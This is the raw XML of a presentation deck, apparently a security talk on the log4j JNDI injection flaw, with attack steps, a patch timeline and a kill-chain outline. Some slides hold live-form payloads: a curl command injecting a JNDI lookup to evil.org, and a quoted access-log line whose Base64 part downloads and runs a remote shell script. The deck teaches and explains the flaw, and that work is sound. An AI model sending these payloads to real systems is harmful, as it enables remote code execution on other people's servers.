          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>log.debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(“User: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>ldapserver</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/user”)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“User: kts” </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11993135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1C61-2EBF-5345-A595-ABF409EF90D7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j – The Vulnerability </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6196546C-881D-CC42-B62B-BBA1E495AFEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker sends data (containing the payload) to the victim system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Data with payload is logged on the victim system via log4j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The vulnerability is triggered with the payload and the victim system makes a request to the attacker controlled system via the Java Naming and Directory Interface (JNDI)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attacker controlled system responds with a remote Java class file that is injected into the server process</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>This injected payload triggers the next stage of the attack which is to run the arbitrary code injected in step 4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="856979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BC02-6FCE-8444-9604-14D9FFBF682B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>So Easy, Anyone Can Do It!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FAA2639-CBD0-324D-8240-AB1259A066C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>GET / HTTP 1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>User-Agent: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>curl -H "User-Agent: ${</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x}" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(Oh and have a running malicious LDAP server listening at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>…)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1788616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EF77-9169-8F41-ABA9-6A4785AA5447}"/>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2E3B006D-AE2B-6840-8501-A16E75B7E1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4638"/>
            <a:ext cx="9143806" cy="6144768"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4266131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5117A7-1400-DE4A-B776-C8CF9FC8B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6646164" cy="6858598"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C91D2129-5DC2-BA46-BF08-F10A55C0CE6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278272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1F87-73A0-F540-9CA8-E07D1BC52639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Timeline (1 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1565DD7-A1D3-3344-99F9-7B650811EC3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Nov 24, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– Issue Discovered by Alibaba Cloud Security Team and they notified the Apache Software Foundation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 1, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– First exploit attempt detected in the wild</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 6, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– log4j 2.15.0 released</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 9, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– Public exploit code released, it’s soon widely in use by attackers/researchers/bored people</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 10, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– (Friday) CVE-2021-44228 published, Apache log4j Security Page updated. Everyone begins patching and starts to realize how significant the issue is and how much of a pain it is.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26043199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65DC-AAA0-6B47-B2DB-C3BF2F37B4FD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Timeline (2 of 2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB4E5FD2-7CF4-ED4F-8406-B03DC80A6A2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 13, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– log4j 2.16.0 released (fixes a DOS issue, JNDI functionality disabled by default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 14, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– CVE-2021-45046 is published</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 17, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– (Friday) CVE-2021-45046 is upgraded from moderate to critical, as it was determined that a remote code execution vulnerability was still possible in 2.15.0, Log4j 2.17.0 released.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>Dec 28, 2021 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>– log4j 2.17.1 released, CVE-2021-44832 log4j 2 through 2.17.0 vulnerable to a RCE when attacker can control configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1488840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7350-F774-4D45-BD0E-B90851CA082B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://twitter.com/eastdakota/status/1469800951351427073</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AD16733-9506-9C43-88D8-678DB8B70D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296688"/>
            <a:ext cx="7620000" cy="3407623"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23275833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8E7A-397F-B74E-A6A6-A039A48D9640}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Sample Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C4AF04-C963-0A49-BB90-8EA6F488941D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>45.137.21.9 - - [11/Dec/2021:02:35:55 +0000] "POST / HTTP/1.1" 301 231 "-"</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jndi:ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7Y2htb2QgK3ggbGguc2g7Li9saC5zaA==}”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"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99641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Kill Chain”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step 1: Reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The attacker gathers information on the target before the actual attack starts. He can do it by looking for publicly available information on the Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>Weaponization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The attacker uses an exploit and creates a malicious payload to send to the victim. This step happens at the attacker side, without contact with the victim.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="114300" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Step 3: Delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>. The attacker sends the malicious payload to the victim by email or other means, which represents one of many intrusion methods the attacker can use.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8224176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8F3C-9CC2-C944-A563-809A9E098F93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log4j Sample Attack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
